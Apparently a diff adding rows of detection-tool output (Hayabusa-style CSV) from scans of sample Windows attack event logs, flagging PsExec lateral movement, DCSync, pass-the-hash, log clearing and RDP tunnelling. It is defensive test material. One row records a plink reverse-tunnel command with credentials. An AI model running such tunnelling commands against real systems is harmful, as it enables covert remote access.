+2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
+2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
+2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
